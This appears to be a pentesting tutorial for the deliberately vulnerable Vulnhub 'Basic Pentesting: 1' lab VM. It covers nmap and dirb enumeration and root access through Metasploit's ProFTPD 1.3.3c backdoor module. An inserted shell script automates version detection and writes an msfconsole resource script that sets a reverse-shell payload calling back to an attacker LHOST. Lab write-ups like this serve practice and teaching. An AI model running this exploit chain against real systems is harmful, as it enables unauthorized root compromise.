Gaining Root Privileges Using a Basic Exploit
In this tutorial, I will demonstrate how to gain root access to the virtual machine “Basic Pentesting: 1” from Vulnhub. A link to the VM download can be found here. Special thanks to the author Josiah Pierce for the upload! Please note that the VM runs under either VMware or VirtualBox.
Part I: Scanning & Enumeration
After downloading the virtual machine and adding it to my network, I began with an ARP scan using netdiscover to see which IP addresses were live on the network.
With the netdiscover results, I identified the target machine at the IP address “192.168.141.139”. With the target confirmed, I ran an nmap scan to determine which ports were open and which services were listening on them.
The nmap results quickly showed that ports 21, 22, and 80 were open. I decided to start with the web page hosted on port 80 to see whether there was anything of interest.
With the web page not providing anything of interest, I began preparing my tools for the next step of the attack.
Part II: Gaining Access
The nmap scan identified the FTP service on port 21 as ProFTPD 1.3.3c. With that version string in hand, I checked whether Metasploit had an exploit for it.
Bingo! An exploit was found via msfconsole. The next step was to configure the exploit's options.
After configuring my settings, I ran the exploit.
Note: my host IP changed at this point because the host (not the target) uses DHCP. As you can see, the exploit gave me root privileges.
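As an added example (not part of the original walkthrough), the hand-off from Part I to Part II scripted in POSIX shell: it parses nmap's grepable (-oG) output for open ports, pulls the version string reported on port 21, checks whether it is ProFTPD 1.3.3c (the release whose source distribution was trojaned with a backdoor, which is what the Metasploit module exploits), and emits the msfconsole resource script that drives the exploit. The nmap output is constructed: only the target address and the ProFTPD 1.3.3c string come from the page, the other banners are sample values. The page does not name the Metasploit module; exploit/unix/ftp/proftpd_133c_backdoor is the one Metasploit ships for this version, and the payload choice and LHOST value are assumptions.

```shell
#!/bin/sh
# Constructed nmap -oG output (not captured from the real VM): only the target
# address and the ProFTPD 1.3.3c banner are from the walkthrough; ssh/http
# banners are sample values. Real -oG output uses tabs where spaces appear here.
NMAP_GNMAP='# Nmap 7.70 scan initiated as: nmap -sV -oG scan.gnmap 192.168.141.139
Host: 192.168.141.139 () Status: Up
Host: 192.168.141.139 () Ports: 21/open/tcp//ftp//ProFTPD 1.3.3c/, 22/open/tcp//ssh//OpenSSH 7.2p2 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/ Ignored State: 997 closed ports
# Nmap done'

# open_ports: read -oG output on stdin, print "port proto service version"
# for every open port. -oG port entries are
# port/state/proto/owner/service/rpcinfo/version, separated by ", ".
open_ports() {
    grep '^Host:.*Ports:' | sed 's/.*Ports: //' | tr ',' '\n' |
    awk -F/ '$2 == "open" {
        gsub(/^[ \t]+/, "", $1)
        printf "%s %s %s %s\n", $1, $3, $5, $7
    }'
}

# service_version: $1 = port number, stdin = -oG output; prints nmap's
# version string for that port (empty if the port is not open).
service_version() {
    open_ports | awk -v p="$1" '$1 == p { $1 = $2 = $3 = ""; sub(/^ +/, ""); print }'
}

# is_backdoored_proftpd: $1 = version string; succeeds only for ProFTPD 1.3.3c,
# the release targeted by Metasploit's proftpd_133c_backdoor module.
is_backdoored_proftpd() {
    case "$1" in
        "ProFTPD 1.3.3c"*) return 0 ;;
        *) return 1 ;;
    esac
}

# msf_resource: $1 = RHOSTS, $2 = LHOST; emits an msfconsole resource script.
# Module name is the one Metasploit ships for 1.3.3c; payload and LHOST are
# assumptions, not values taken from the walkthrough.
msf_resource() {
    cat <<EOF
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOSTS $1
set PAYLOAD cmd/unix/reverse
set LHOST $2
run
EOF
}

# Stand-alone run: list open ports, then decide whether port 21 is exploitable.
printf '%s\n' "$NMAP_GNMAP" | open_ports
ftp_ver=$(printf '%s\n' "$NMAP_GNMAP" | service_version 21)
if is_backdoored_proftpd "$ftp_ver"; then
    echo "port 21: $ftp_ver -> exploit/unix/ftp/proftpd_133c_backdoor applies"
    # On the attacking host (LHOST assumed to be 192.168.141.128):
    #   msf_resource 192.168.141.139 192.168.141.128 > proftpd.rc
    #   msfconsole -q -r proftpd.rc
else
    echo "port 21: ${ftp_ver:-no open ftp service}; look elsewhere"
fi
```

Feed it a real scan with `nmap -sV -oG - 192.168.141.139 | ...` in place of the constructed variable; the parser only relies on the documented -oG field layout, so it works unchanged on live output.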
Part III: Conclusion
Although nothing stood out when we first viewed the web page that nmap had picked up on port 80, that did not necessarily mean nothing was there. The thing about pentesting is that there are multiple ways of analyzing a system and breaking into it, and the path taken comes down to the pentester. With constant repetition and practice, you will begin to discover new attack vectors. An example is “dirb”, a web content scanner shipped with Kali Linux. After running dirb http://192.168.141.139 I was able to determine that WordPress was running on the machine and that a hidden page called “secret” was available.
This could potentially lead us down a different path towards breaking into the machine.
I hope you enjoyed the walkthrough, Cheers!